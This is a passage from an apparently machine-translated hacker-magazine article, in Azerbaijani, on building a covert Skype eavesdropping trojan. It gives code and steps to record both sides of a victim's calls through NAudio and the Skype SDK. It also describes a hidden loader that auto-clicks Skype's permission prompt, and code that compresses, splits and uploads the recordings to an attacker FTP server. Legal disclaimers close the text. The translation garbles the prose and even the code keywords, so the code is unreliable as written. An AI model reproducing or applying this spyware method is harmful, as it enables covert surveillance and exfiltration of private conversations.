Əgər dəyərli mənbə kodunu tapa bilsəniz, o zaman bütün kozırların əlinizdə olduğunu və
İndi bütün skyperlər sizin üçün hədəfə çevriləcək.

Metod №2

Şübhəsiz ki, birinci üsul ən yaxşısıdır, lakin həyata keçirilməsi həqiqətən çətindir.
Düzünü deyim: mən artıq çarəsiz idim və bütün işə bir dəmir bolt qoymaq istəyirdim, amma
köşə redaktoru fərqli fikirdə idi. Bir neçə göstərişdən sonra böyrəklərə iki zərbə və
qaraciyər, mən material hazırlamaqdan imtina edə bilmədim. Göründüyü kimi, mən bunu etməmişəm
boş yerə.

Əgər məqsədə birbaşa çata bilmirsinizsə, o zaman arxadan yaxınlaşmalısınız. Belə ki
Sənin təvazökar qulun da elə etdi. İdeya olduqca sadədir və bəlkə də siz artıq
Mən hətta bu funksiyanı yaxşı bir məqsəd üçün istifadə etdim.

Mən kolun ətrafında döyməyəcəyəm, amma bütün kartlarımı ortaya qoyacağam. Belə ki, isti mənim
Microsoftun sevimli əməliyyat sistemləri belə bir xüsusiyyətə malikdir - stereo mikser.
Az adam bilir ki, bu zahirən yararsız başıboş və sayəsində
tam hüquqlu bir proqramlaşdırma dili yaratmaq həqiqətən mümkündür
skype casus.

Sizin (və ya həqiqətən sizin deyil?) Sisteminizdə stereo mikseri aktivləşdirin və siz
hər iki səs axını nəzarətə tabe olur - mikrofona gedən və
müvafiq olaraq, dinamiklərə/qulaqlıqlara gedən biri. Nə olduğunu təxmin edə bilərsiniz?
mən ondan uzaqlaşıram? Düzdür, iki nəfər arasında söhbəti Skype-da yayımlamaq üçün sadəcə olaraq lazımdır
audio yazmaq üçün standart WinAPI/obyektlərdən istifadə etməli olacaqsınız
mikrofon.

Bunu etmək olduqca sadədir və baxaraq bunu yoxlaya bilərsiniz
Haşiyə 1. Orada səsin yazılmasına cavabdeh olan hissəni qeyd etdim. Hamısına tələsməyin
onu yenidən yazın, onsuz da dərhal tərtib edilməyəcək.

Təəssüf ki, .NET Framework-ün bütün gücünə və sonsuz imkanlarına baxmayaraq, o
Səs yazmaq üçün tamamilə heç bir alət yoxdur. Şübhəsiz ki, gələcəkdə
versiyalarda bu boşluq doldurulacaq, amma gözləyə bilmərik!

Bir çox .NET tərtibatçıları öz proqramlarında imkanları təşkil etmək istəyirlər
səs yazıları banal API funksiya zənglərindən istifadə edir. Yaxşı seçim, amma
son dərəcə əlverişsizdir. Bir az fərqli yolla getdim və öyrəndiklərimdən yararlandım
Mark Heath.

Bu adam əla iş gördü və NAudio layihəsini - audio redaktoru yaratdı
açıq mənbə. Layihənin bir hissəsi olaraq, Mark imkan verən bir çərçivə yazdı
işləmək üçün müxtəlif WinAPI funksiyaları ilə mümkün qədər rahat şəkildə qarşılıqlı əlaqə qurun
səs.

NAudio burada mövcuddur. Sadəcə
onun modullarını layihənizə əlavə edin və bütün lazım olanlar sizin üçün əlçatan olacaq
siniflər. Onların köməyi ilə səs yazmaq olduqca sadədir. Bəli, yəqin ki, artıq bu işin içindəsən
Mən əminəm :).

Siyahının ən əvvəlində WAV fayl formatını təyin edirəm. Bunun üçün mənə lazımdır
kanalların sayını (bizim vəziyyətimizdə mono ilə yazacağıq) və tezliyi təyin edin
nümunə. Audio fayl formatı parametrlərinə əlavə olaraq cihazı müəyyən etməliyəm
səsi tutacağımız (cihaz nömrəsi). Mən onu 0-a təyin etdim, yəni
standart qeyd cihazına uyğundur.

Səs kartında alınan məlumatların növbəti hissəsi haqqında öyrənə bilərik
waveIn_DataAvaible() hadisəsi. İşləyibsə, məlumat gəldi və
qeyd etmək lazımdır.

Və burada ilk çatışmazlıqlar var

Ağlamağa tələsməyin və tələsik Skype üçün zərərli proqram yaratmağa çalışmayın.
Təklif etdiyim üsul yaxşıdır və tam funksionaldır, lakin var
Əvvəlcədən bilməli olduğunuz bir sıra çatışmazlıqlar var. Onlardan bəziləri:

1. İstifadəçinin sistemində ümumiyyətlə stereo mikserin olmasına zəmanət yoxdur
aktiv olacaq. Bəli, standart olaraq aktivdir, lakin bir çox istifadəçi məcbur edir
söndürün. Nə üçün? Şəxsən mən yazdıqlarıma görə bunu etməliyəm.
podkastlar və səsin yalnız mikrofonumdan götürülməsi mənim üçün son dərəcə vacibdir və
ortaq ev sahibinin səsləri deyil.

Proqramınız bu vəziyyətə və bir şey olarsa hazırlanmalıdır
lazımi parametrləri özünüz edə bilərsiniz. Burada kiçik olanlar yaranır
mürəkkəblik, amma kimsə bunun tamamilə sadə olacağını söylədi?

2. Etibar edə biləcəyiniz və 100% əmin ola biləcəyiniz aydın istinad nöqtəsi yoxdur
indi istifadəçi həmsöhbəti ilə ünsiyyət qurmağa başlayıb. Birində
Bu problemi həll etmək üçün kodlaşdırma forumları aşağıdakı metodu təklif etdi:
mikrofona daxil olan səsi təhlil edin və böyük aşkar edildikdə
səs dalğası sıçrayışları (yəni bir adam qışqırmağa/danışmağa başlayanda) başlayır
qeydlər. Ara vermək üçün təxminən aşağıdakı alqoritmə əməl etməlisiniz:
Səssizliyi gözləyirik və n dəqiqədən çox davam edərsə, səsi çəkməyi dayandırırıq.

Təklif olunan alqoritm şübhəsiz yaxşıdır, lakin yuxarıda təsvir edilən formada daha yaxşıdır
istifadə etməyin. Səbəbini izah etməyə çalışacağam. Bu üsuldan təmiz formada istifadə edərək,
çoxlu sayda yanlış pozitivlərlə qarşılaşmaq riskiniz var. Əgər varsa
düşmən ərazisində, mikrofon yorulmadan səslənən dinamiklərin yanında yerləşir
ağır metal, sonra sizin troy daim qeyd edəcək və məhsul zamanı
Siz qurbanınızın bütün sevimli musiqilərinin kolleksiyasına sahib olduğunuzu görəcəksiniz. Nə
onda nə etməli? Şans ümid edib hər şeyi yazırsan? Mümkündür, amma nədənsə belə deyil
haker üslubunda.

Bir az beyin fırtınası etdim və yuxarıdakıların olduğu qənaətinə gəldim
Bu üsuldan istifadə edə bilərsiniz, ancaq əvvəlcə sığorta təşkil etməklə.
Sığorta ən azı iki növ ola bilər:

1. Qarmaqlar. Jurnalımızda qarmaqlardan istifadə texnikasını dəfələrlə təsvir etmişik,
və bir daha bütün detalları təsvir edin və üstəlik, misallar verin, mənə
çox qırılır. Sən artıq balaca deyilsən və belə şeyləri bilməlisən :). Mən indicə
Mən bir alqoritm təklif edəcəyəm:

a. Yeni pəncərələrin yaradılmasını idarə etmək üçün bir çəngəl qoyduq.

b. Hər yeni yaradılmış pəncərəni emal etdiyimiz bir yoxlama həyata keçiririk. IN
Doğrulama kodunda biz baxmalıyıq: pəncərənin valideyni, pəncərənin sinfi, başlıq və s.
Bu əlamətlərə əsasən, biz gələn Skype zənginin pəncərəsini və korpusunu tanıya bilərik
yazmağa haradan başlamaq lazımdır.

2. Pəncərələrlə işləmək üçün funksiyalar. Problemin ikinci həlli yaxşı olardı
Windows ilə işləmək üçün tanış WinAPI funksiyaları. Bunları hələ də xatırlayırsınız?
FindWindow, EnumWindows, EnumChildWindows və s kimi sözlər? Bu API-lərdən istifadə
daxil olan zəng pəncərəsi üçün banal axtarış həyata keçirilir. Pəncərə tapılarsa, bu
qurbanın Skype-da söhbət etməyə başladığını bildirir, əks halda sizə lazımdır
bir az sonra axtarın. Axtarış tezliyi minimal olmalıdır,
əks halda gizli zəngləri qaçırma riski ilə üzləşirsiniz.

Metod №3

Beləliklə, yavaş-yavaş, lakin şübhəsiz ki, ən sadə və ən rahat yola gəldik
Skype danışıqlarının qeydləri. Skype tərtibatçılarının insanları həvəsləndirdiyini az adam bilir
beyinləri üçün hər cür faydalı şeylər inkişaf etdirmək istəyənlər. Təşviqin özü
rəsmi SDK-nın inkişafı və yenilənməsi ilə ifadə edilir.

SDK-ya daxil olan komponentlərə əsasən proqramçılar əlavələr yarada və ya
sadəcə Skype-a əsaslanan proqramlar. Bu dəstin gözəlliklərindən biri kimi
Müxtəlif populyar proqramlaşdırma dilləri üçün nümunələrin mövcudluğunu vurğulaya bilərsiniz.
Burada siz C++, C# və hətta böyük və qüdrətli Delphi-ni də unutmayacaqsınız (yeri gəlmişkən, hər şey deyil.
əlbəttə, lakin Skype özü Delphi-də yazılmışdır). Bir sözlə, bu SDK üçün cənnətdir
Skype ilə işləməyə qərar verən proqramçılar.

Sizin və mənim üçün SDK cənnətdən daha soyuqdur. Bu çərçivəyə əsaslanaraq biz
biz nəinki istifadəçinin səs rabitəsini qeyd edə, həm də kəsə bilərik
onun qəbul etdiyi və göndərdiyi mətn mesajları, faylları, ondan zəng edin
adı və s.

Amma gəlin lokomotivdən qabağa qaçmayaq, artıq sınadığımızı tərifləməyək, amma
Bir nümunədən istifadə edərək bütün nüanslarla tanış olaq.

DVD-mizə gedin və SDK-nı quraşdırın. Quraşdırma çətin olmamalıdır.
Sadəcə faylı SDK qovluğundan işə salın və sizdən tələb olunan hər şeylə razılaşın.
Quraşdırmanı tamamladıqdan sonra Visual Studio proqramını işə salın (2008 versiyasından istifadə etdim) və
yeni layihə yaradın. Layihə növü kimi SEHEwc şablonunu seçin.

Siz layihənizi yaratdığınız müddətdə SEHEwc şablonu haqqında qısaca danışacağam. Açığı
desək, bu adi mənada tam şablon deyil. Real həyatda bu tam hüquqludur
təriflədiyim SDK-nın bütün imkanlarını nümayiş etdirən bir nümunə. Demo çox yaxşı yazılmışdır
yaxşı və kodunu başa düşmək xoşdur.

Koda dalmadan əvvəl Skype-ı işə salın və yaradılmış layihəni işə salın (I
İndi şablon haqqında). Mənbə kodu icra edildikdə, Skype-ınız sədaqətlə hesabat verəcək,
filan proqram öz funksiyalarına daxil olmağa çalışır. irəli get və
Skype vasitəsilə mətn mesajı göndərməyə çalışın. Onu işdən çıxarmağa vaxt tapmadan,
Bütün göndərilən mətn mətn sahəsində görünəcək. Bu o deməkdir ki
Demo uğurla işləyir.

Nümunənin gücü şübhəsizdir. İlk baxışdan elə görünə bilər
onun kodu ən mürəkkəb proqramlaşdırma suallarına cavab verir
Skype. Ancaq bizim üçün ən vacib xüsusiyyət, təəssüf ki, daxil olmayan söhbət qeydidir
həyata keçirilən. Yaxşı, vəziyyəti düzəldəcəyik.

Kod redaktoruna gedin və OurCallStatus metodunun təsvirini tapın. Bədənində
Cari zəng haqqında müxtəlif məlumatların əldə edilməsini təsvir edir. Hər şey yaxşıdır və çılğındır
maraqlıdır, amma biz başqa bir şey istəyirik. Mövcud kodu silin və əvəzinə onu yenidən yazın
Üçüncü qutunun məzmunu. Yenidən yazarkən sizə nə deyəcəyəm
orada baş verir.

İlk sətirdə mən yoxlayıram və dəyişənin dəyərini müqayisə edirəm
TCallStatus sadalamasının clsInProgress dəyəri ilə status (uh,
tip adından əvvəl nostaljik delfin T hərfi :)). Əgər bərabərdirlərsə, deməli
Söhbət tam sürətlə gedir və səs yazmağa başlamağın vaxtıdır.

İndi hazırlaşın və səsyazma olduğunu biləndə stulunuzdan düşməyin
yalnız bir xətt ilə edilir:

call.set_CaptureMicDevice(TCallIoDeviceType.callIoDeviceTypeFile,
@"Yadda saxlanacaq yol" + call.Id.ToString() + ".wav");

set_captureMicDevice metodunun ilk parametri cihazın ötürülməsini tələb edir
mikrofondan gələn axın çıxışı olacaq. Cihaz növləri saxlanılır
siyahı TCallIoDeviceType. Biz səsi fayla çəkmək istəyirik, ona görə də təyin etdik
callIoDeviceTypeFile. İkinci parametr birincidən asılıdır. Bizim vəziyyətimizdə, o
qeyd nəticəsini saxlayacağımız faylın yolu ötürülür.

Nəzərə alın ki, set_captureMicDevice metoduna zəng etməklə biz yalnız qənaət edəcəyik
qurbanımızın səsi və danışdığı şəxslər pərdə arxasında qalacaq. yazın
set_OutputDevice metodundan istifadə edərək həmsöhbət olacağıq:

call.set_OutputDevice(TCallIoDeviceType.callIoDeviceTypeFile, @"Yol
harada saxlamaq lazımdır" + call.Id.ToString() + ".wav");

Onun parametrləri əvvəlki ilə tamamilə eynidir, buna görə iki dəfə
sənə deməyəcəyəm :).

Deyə bilərik ki, hər şey hazırdır. Layihəni tərtib edin və işə salın. Başlayanda
Skype-da inyeksiyanı təsdiq etməyi unutmayın, əks halda heç nə çəkə bilməyəcəksiniz.

Tətbiqimizi real şəraitdə sınaqdan keçirməyə çalışaq. Özündən soruş
Skype-da sizə zəng etmək və sizinlə bir az söhbət etmək üçün bir dost.

Siyahını yenidən yazarkən son dərəcə diqqətli olsanız, köçürülənlərə görə
faylları saxlamaq üçün captureMicDevice və set_OutputDevice yolları olacaq
təzə bişmiş WAV-ları qoyun. Pleyerinizdə onlara qulaq asın və hər şeyin olduğundan əmin olun
lazım olduğu kimi işləyir.

SDK-dan istifadə olduqca asandır (xüsusilə .NET altında yazsanız) və onun
peşəkar inkişaf edərkən imkanlar mütləq tələb olunacaq
skype-logger.

Mətn mesajlarını necə tutacağınızı sizə deməyəcəyəm və
digər faydalı məlumatlar. Bütün bunlar bir neçə üsul çağıraraq edilir
ətraflı sənədləşdirilir. Sənədlər (əlbəttə ki, ingilis dilində) həmişə mövcuddur
rəsmi portal:

https://developer.skype.com/Docs/Skype4COMLib. Əgər probleminiz varsa
İngilis dili ilə, sonra üzülməyin. Sadəcə proqram şablon koduna baxın. Düşün,
başa düşəcəksən. Son çarə olaraq mənə yazın.

Narahat məhdudiyyətlər

Rəsmi SDK-nın bir, lakin olduqca böyük bir çatışmazlığı var. Başladığınız zaman
Skype proqramı daim həyəcan təbili çalacaq. Qurbanın gördüyü halda özünüz başa düşürsünüz
sualı olan qəribə bir pəncərə: "bu proqrama daxil olmağa icazə verməliyəm?", sonra ilə
Onun “Xeyr” düyməsini basması və siz tozun içində qalmağınız 99,9% şansdır. Kimə
bu baş vermədi, sizə iki proqram hazırlamağı məsləhət görürəm - biri olacaq
səs tutmağa yönəlib və rahat C# dilində yazılıb, ikincisi isə özününküdür
bir növ yükləyici. Onun əsas məqsədi sistemdə diqqətdən kənarda qalmaq olacaq,
lazımsız pəncərələrdə düymələri gizlətmək/klikləmək (bu, işə salınma təsdiqi pəncərəsi haqqındadır). İstisna
Üstəlik, bu proqram yükləyicisi vasitəsilə bütün funksiyaları həyata keçirmək mümkün olacaq
pult və s. Ümumiyyətlə, fikri başa düşürsən.

"Lazımsız" pəncərələrlə necə məşğul olmaq olar?

Skype söhbətlərini çəkməyin həm ikinci, həm də üçüncü üsullarında problemlə üzləşdik
- başqa proqramın pəncərələri ilə qarşılıqlı əlaqə. Yad adamlarla işləmək haqqında dedim
jurnalımızda dəfələrlə pəncərələr haqqında danışdıq (oğurluq haqqında bir məqalə tövsiyə edirəm
web pul cüzdanları, 3-4 il əvvəl nəşr olundu), ancaq yeni qoşulmuş olsanız
bizim partiyamız və nəyi və necə olduğunu bilmirsinizsə, tənbəl olmayın, bing.com saytına daxil olun və ora baxın
FindWindow, GetWindowText, PostMessage funksiyaları ilə bağlı. Kiçik yumşaq mallar üçün axtarış sistemi
dərhal sizi MSDN-nin istədiyiniz bölməsinə aparacaq və siz tez bir zamanda edə bilərsiniz
Bu faydalı xüsusiyyətlərlə tanış olun.

Fayl çıxışı

Gec-tez başqa bir böyük problemlə qarşılaşacaqsınız - məhsul yığımı.
Əlbəttə ki, qurbanın bütün söhbətlərini dəqiq saxlamaq yaxşıdır, amma bunun nə faydası var
talan edilmiş malları toplayıb təhlil etmək mümkün olmadıqda? Düzdü,
heç biri.

Spy for Skype keylogger deyil və onun qeydləri asanlıqla poçtla göndərilə bilməz
göndərəcəksən. Səsli fayllar nəinki qəddarcasına ağırlaşır, həm də köçürməlidirlər
Onların smtp protokolu heç də yaxşı deyil.

Əgər istifadəçi oturmursa, faylların çıxarılması işi bir neçə dəfə çətinləşir
limitsiz (bəli, bunlar hələ də mövcuddur). Bu halda, böyük göndərilməsi
faylların həcmi statistikaya təsirsiz ötüşməyəcək və bu məcburidir
qabaqcıl istifadəçini xəbərdar edəcək. Xüsusən də təcrübə keçirdikdə
onlayn olarkən böyük yavaşlamalar.

Bir az düşündükdən sonra aşağıdakı alqoritmlə gəldim:

  1. Hər bir audio faylın mp3 formatına kodlaşdırılması. Əvvəlcə bütün söhbətlər
    Qurbanımıza çox ağır olan WAV-larda yazdıq. Məsələn, orta
    uzun söhbətin ölçüsü (təxminən bir saat) 50-80 metrə çata bilər
    parametrlərdən asılı olaraq). Belə bir faylı təmiz formada göndərmək, yumşaq desək,
    qeyri-real. mp3 formatına çevirmək ölçü problemini qismən həll edəcək. Əgər
    maksimum sıxılma nisbətini və minimum bit sürətini təyin edin, sonra ölçüsü olacaq
    3-4 dəfə azaldın. Bu daha yaxşıdır, amma mükəmməl deyil. Eyni 5 metrin çıxışı
    çətin görünə bilər.
  2. Faylın kiçik hissələrə bölünməsi. Əvvəlki paraqrafda mən bunu dedim
    faylı mp3-ə kodlaşdırmaq kimi bir əməliyyat belə sizi problemlərdən xilas etməyəcək
    yönləndirmə. Sıxılmış faylı daha kiçik hissələrə bölmək və göndərmək daha yaxşıdır
    artıq onlar. Məsələn, mp3-ü 300-500 KB həcmində parçalara ayırın. Belə xırda şeylər
    döyüş meydanından çıxarmaq daha asan və daha sürətli olacaq.

Düşünürəm ki, faylları göndərmək üçün hazırlamaq haqqında hər şeyi söylədim. Tez keçək
Göndərmə üsulu. Bir neçə bənd yuxarıda belə şeylər göndərdiyini ifadə etmişdim
smtp vasitəsilə çox düzgün deyil və sadəcə problemlidir. Harada istifadə etmək daha yaxşıdır
illər ərzində sübut edilmiş, yaxşı köhnə ftp! .NET tətbiqinizə daxil edin
sadə FTP müştəri - daha sadə nə ola bilər? Yan panelə baxın və özünüz baxın.

Xoşbəxt sonluq

İnsan imkanlarının həddi-hüdudu yoxdur və mükəmməlliyin hüdudu yoxdur. Həll olunmaz
Heç bir problem yoxdur və bütün çətinliklərin öhdəsindən gəlmək olar. Bu gün sizə danışdım
səs qeydinin skelet quruluşu və sonrakı seçim yalnız sizdən asılıdır. Və ya
aldığınız bütün məlumatları bir yığına yığacaqsınız və onun üçün çətin bir casus yaradacaqsınız
Skype və ya hüquqi ehtiyat nüsxəsi üçün peşəkar bir vasitə hazırlayacaqsınız
danışıqlar :). Seçim sənindir, mənim edə biləcəyim tək şey sağollaşıb sənə arzulamaqdır
Uğurlar!

P.S. Trojanımın tam mənbə kodunu istəməyin. Onsuz da vermərəm, acgözəm :). A
ciddi desəm, mən belə şeyləri dəstəkləmirəm və istəmirəm ki, çox adam axmaqcasına yığsın
layihəni bitirdi və hərbi əməliyyatlara başladı. Telefon dinləməsidir
şəxsi həyatına müdaxilə və bu, qeyri-qanuni olmaqla yanaşı, həm də çirkindir! görüşənədək!

Xəbərdarlıq

Başqalarının söhbətlərini dinləmək çox qanunsuzdur. istifadə edin
yalnız söhbətlərinizin ehtiyat nüsxəsini yaratmaq üçün alınan məlumat!

Qutu 1. Səsin yazılması

//Çəkilməyə hazırlaşır
waveIn = new WaveIn();
waveIn.DeviceNumber = 0;
waveIn.DataAvailable += waveIn_DataAvailable;
int sampleRate = 8000;
int kanalları = 1;

waveIn.WaveFormat = yeni WaveFormat(sampleRate, kanallar);
waveIn.StartRecording();

void waveIn_DataAvailable(obyekt göndərən, WaveInEventArgs e)
{
əgər (recordingState == RecordingState.Recording)
writer.WriteData(e.Bufer, 0, e.BytesRecorded);

Qutu 2. Daxil olan zənglərin fayla yazılması

cəhd edin
{
// Daxil olan zəngi qeyd edin
əgər (status == TCallStatus.clsInProgress)
{
//Səsi çəkin və yadda saxlayın
//fayl (istifadəçi mövzusu)
call.set_CaptureMicDevice(

@"C:\temp\sound_user" + call.Id.ToString() +
".wav");

// Səsi çəkin və yadda saxlayın
//onu fayla (bütün digər həmsöhbətlər
call.set_OutputDevice(
TCallIoDeviceType.callIoDeviceTypeFile,
@"C:\temp\sound_people" + call.Id.ToString() +
".wav");

}
}
tutmaq (istisna e)
{
//Səhvləri göstərin
AddTextToTextBox1(DateTime.Now.ToLocalTime() + ": " +
" Kodumuz - Audionu çəkmək mümkün deyil: " + call.Id.ToString() +
" – Xəta mənbəyi: " + e.Mənbə + " – Xəta mətni: " + e.Mesaj +
"\r\n");

Qutu 3. FTP Dot .NET sinfinə əsaslanan sinifdən istifadə edən FTP müştərisi

cəhd edin
{
FtpConnection myFtpConnection =
yeni FtpConnection();
myFtpConnection.MessageReceived +=
yeni FtpConnectionEventHandler(connection_MessageReceived);

myFtpConnection.Host =
"ftp://myftpserver";
myFtpConnection.UserName =
"istifadəçi adı";
myFtpConnection.Password =
"parol";
myFtpConnection.RemoteDirectory =
"/temp/testforxakep";
myFtpConnection.Upload(@"C:\temp\sound.part1.mp3",
"sound.part1.mp3");
}

tutmaq (WebException istisna olmaqla)
{

}
tutmaq (istisna istisna olmaqla)
{
Console.WriteLine(ex.ToString());
}

etibarsız əlaqə_MessageReceived(obyekt göndərən,
FtpConnectionEventArgs e)
{
Console.WriteLine(e.Message);